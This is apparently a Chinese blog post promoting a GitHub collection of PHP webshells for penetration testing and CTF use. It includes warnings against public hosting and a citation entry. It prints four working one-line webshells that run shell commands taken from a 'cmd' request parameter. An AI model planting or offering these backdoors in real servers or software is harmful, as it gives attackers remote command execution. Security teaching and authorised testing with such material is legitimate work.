常见的PHP WebShell,您可能需要在渗透测试任务或CTF挑战中使用。请不要在您的服务器上托管这些文件!
作者:Sec-Labs | 发布时间:
项目地址
https://github.com/JohnTroony/php-webshells
小编推荐
这个Github项目是一个收集了常见的PHP Webshell,可以用于渗透测试或CTF挑战,提供给教育目的使用。
相关技术点
- PHP编程语言
- webshell
项目用途
- 收集了常见的PHP Webshell,可以用于渗透测试或CTF挑战。
- 提供了一些常用的一行代码Webshell,例如
<?php echo passthru($_GET['cmd']); ?>,可以用于快速测试。 - 提供了一个警告,不要在公共可访问的Web服务器上托管这些文件。只有在教育目的或合法的渗透测试案例下使用。
贡献
如果想贡献其他未在此列表中列出的 shell...请先 Fork 该项目,然后将更改 Push 到您的仓库中,再在向我们请求 Pull 之前,请确保包括一个简单的 php web-shell 描述和一个 web-shell 的屏幕截图(在您的本地主机上托管)。
PHP Webshells
常见的 PHP shells 是一个 PHP webshell 集合,你可能需要在渗透测试(PT)或CTF挑战中使用。
不要在公共可访问的 web 服务器上托管任何文件(除非你知道你在做什么)。
这些仅供教育目的和合法的 PT 用例。
如果我发现任何新的 webshell,我会不断地更新它们。
FYI
对于基本功能,我推荐使用像这样的一行代码:
<?php echo passthru($_GET['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>
引用:
@software{jacques_pharand_2020_3748072,
author = {Jacques Pharand and
John Troon and
Javier Izquierdo Vera},
title = {JohnTroony/php-webshells: Collection CS1},
month = apr,
year = 2020,
publisher = {Zenodo},
version = {1.1},
doi = {10.5281/zenodo.3748072},
url = {https://doi.org/10.5281/zenodo.3748072}
}
标签:工具分享, webshell绕过, 后门生成工具, PHP安全